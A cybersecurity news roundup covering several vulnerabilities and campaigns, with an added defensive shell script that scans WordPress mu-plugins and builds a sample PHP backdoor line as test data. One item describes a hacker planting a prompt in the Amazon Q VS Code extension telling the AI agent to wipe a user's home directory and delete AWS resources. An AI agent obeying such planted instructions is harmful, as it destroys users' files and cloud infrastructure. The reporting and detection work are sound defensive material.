
In today’s cybersecurity news…
SonicWall announces SMA 100 patches
Following up on a story we covered last week, network security company SonicWall announced on Wednesday the release of patches for a critical vulnerability in its Secure Mobile Access (SMA) 100 series secure access gateways, and recommends that customers take immediate action in light of the recent Overstep malware attacks. The flaw, tracked as CVE-2025-40599 with a CVSS score of 9.1, is described as “an arbitrary file upload issue in the SMA 100’s web management interface,” which could allow remote code execution (RCE) by an attacker who already holds administrative privileges.
FBI warns about The Com, a loosely organized cybercriminal network
The FBI describes The Com as a “loosely organized cybercriminal organization” that launches cyberattacks to steal money and gain access to sensitive information. The Bureau says The Com is “composed primarily of English-speaking minors but has expanded to include thousands of people who engage in a variety of cybercriminal activities”. It adds that the group’s sophistication “has grown over the last four years, with subjects employing increasingly complex methods to mask their identities, hide financial transactions, and launder money.” Minors are recruited because being underage promises less harsh penalties if caught. Scattered Spider, known for a number of high-profile attacks this year, is an affiliate of the group.
Compromised Amazon Q extension told AI to delete everything
A hacker whose apparent intent was to expose poor security practices partly succeeded by compromising the official Amazon Q extension for Visual Studio Code, adding a prompt that instructed the AI agent to wipe a user’s home directory and delete all of their AWS resources. According to a report from 404 Media, the hacker “submitted a pull request to the AWS repository from ‘a random account with no existing access’ and were given admin credentials.” They said that AWS then released the compromised package “completely oblivious.” Amazon quickly removed the unapproved code and revoked the hacker’s credentials, but has released no explanation of how this happened.
(The Register and 404 Media)
WordPress backdoor hides inside Mu-plugin
A new backdoor has been discovered in WordPress “must-use” plugins (aka mu-plugins), one that gives threat actors “persistent access and allow[s] them to perform arbitrary actions.” Mu-plugins are activated automatically on every site in a WordPress installation and are stored in the wp-content/mu-plugins directory. They “do not show up in the default list of plugins on the Plugins page of wp-admin and cannot be disabled except by removing the plugin file from the must-use directory.” The backdoor, a PHP script, was discovered by web security company Sucuri.
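Because mu-plugins never appear on the Plugins page, the only reliable check is on disk. The shell script below is an added example, not Sucuri’s or the WordPress project’s code: it inventories every PHP file under wp-content/mu-plugins with a SHA-256 hash (so a baseline can be diffed on later runs) and flags files that use constructs common in PHP backdoors. The sample directory it builds, including the file named wp-cache-helper.php, is constructed for illustration and is not the backdoor Sucuri analysed.

```shell
#!/bin/sh
# Added example (not from Sucuri or WordPress): inventory wp-content/mu-plugins,
# the directory WordPress auto-loads and does not list in wp-admin, and flag PHP
# files using constructs typical of backdoors. A flag is a lead for review, not proof.

# hash_file FILE -> sha256 hex digest, so a baseline can be diffed on later runs
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# scan_mu_plugins DIR -> one "HASH<tab>PATH" line per .php file, then one
# "SUSPECT<tab>PATH<tab>PATTERN" line per suspicious construct found in it.
# Recurses because a one-line top-level loader often include()s its payload from a subdirectory.
scan_mu_plugins() {
    dir="$1"
    [ -d "$dir" ] || { echo "no mu-plugins directory at $dir" >&2; return 0; }
    find "$dir" -type f -name '*.php' | sort | while IFS= read -r f; do
        printf '%s\t%s\n' "$(hash_file "$f")" "$f"
        # Fixed-string patterns (grep -F) that a legitimate must-use plugin rarely needs.
        for pat in 'eval(' 'base64_decode(' 'gzinflate(' 'str_rot13(' 'assert(' \
                   'create_function(' 'curl_exec(' 'file_get_contents("http' \
                   "file_get_contents('http" '$_REQUEST' '$_POST' '$_COOKIE'; do
            if grep -qF -- "$pat" "$f"; then
                printf 'SUSPECT\t%s\t%s\n' "$f" "$pat"
            fi
        done
    done
}

# count_suspects DIR -> number of distinct flagged files, handy for an alert threshold
count_suspects() {
    scan_mu_plugins "$1" | awk -F'\t' '
        $1 == "SUSPECT" { seen[$2] = 1 }
        END { n = 0; for (k in seen) n++; print n }'
}

# make_sample -> path to a constructed mu-plugins directory holding one benign plugin
# and one file that mimics a loader backdoor (sample data, not the malware Sucuri found).
make_sample() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/mu-plugins"
    cat > "$root/wp-content/mu-plugins/site-tweaks.php" <<'EOF'
<?php
// Benign: hides the admin bar for logged-in users.
add_filter('show_admin_bar', '__return_false');
EOF
    cat > "$root/wp-content/mu-plugins/wp-cache-helper.php" <<'EOF'
<?php
// Innocuous name; decodes and executes whatever arrives in a request parameter.
if (isset($_REQUEST['c'])) { eval(base64_decode($_REQUEST['c'])); }
EOF
    echo "$root/wp-content/mu-plugins"
}

# Scans the constructed sample when run without arguments; pass a real path to scan an install:
#   sh mu_scan.sh /var/www/html/wp-content/mu-plugins
scan_mu_plugins "${1:-$(make_sample)}"
```

Two caveats when running this against a real site: the directory can be relocated with the WPMU_PLUGIN_DIR constant in wp-config.php, so check that constant rather than assuming the default path, and WordPress itself only loads .php files at the top level of the directory, so a file in a subdirectory is only live if a top-level file includes it, which is exactly the case the recursive listing is meant to surface. Store the hash lines from a known-good state and diff them on each run; a new or changed hash in this directory deserves a look even when no pattern fires.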
Huge thanks to our sponsor, Nudge Security

Brave blocks Windows Recall from screenshotting browsing activity
Brave Software says its browser, already well known for its privacy features, will block Microsoft’s new Windows Recall feature from capturing screenshots of Brave windows, and the protection will be active by default. Facing widespread criticism, Microsoft has added an opt-out to some Windows editions, but this marks a first step in blocking the feature out of the gate: Brave calls the SetInputScope API with IS_PRIVATE for all of its browser windows, a flag that Recall honours.
CISA adds CrushFTP, Google Chromium, and SysAid flaws to its Known Exploited Vulnerabilities catalog
CISA has added flaws in CrushFTP, Google Chromium, and SysAid to its Known Exploited Vulnerabilities (KEV) catalog. This follows a CrushFTP warning of a zero-day (CVSS score 9.0) that has been exploited since July 18, six Google Chrome flaws, including one actively exploited in the wild, and three flaws in SysAid. CISA has ordered federal agencies to fix the vulnerabilities by August 12, 2025.
Mitel warns of critical MiVoice MX-ONE authentication bypass flaw
Mitel Networks has “released security updates to patch a critical-severity authentication bypass vulnerability impacting its MiVoice MX-ONE enterprise communications platform,” a SIP-based (Session Initiation Protocol) communications system that can scale to support hundreds of thousands of users. According to BleepingComputer, “the critical security flaw is due to an improper access control weakness discovered in the MiVoice MX-ONE Provisioning Manager component and has yet to be assigned a CVE ID.” Unauthenticated attackers can exploit it in low-complexity attacks that require no user interaction to gain access to administrator accounts on unpatched systems.
Fake Dalai Lama apps spy on Tibetan community
Devotees who wanted to send good wishes to the spiritual leader ahead of his 90th birthday on July 6 were unwittingly targeted by a China-affiliated cyber espionage group in two campaigns that Zscaler ThreatLabz has named Operation GhostChat and Operation PhantomPrayers. These were standard watering hole operations, redirecting users from a legitimate but compromised website to a fraudulent one. The replica page offered well-wishers the option to send an encrypted greeting by downloading a “secure” chat application, which was ultimately the launch vector for a remote access trojan.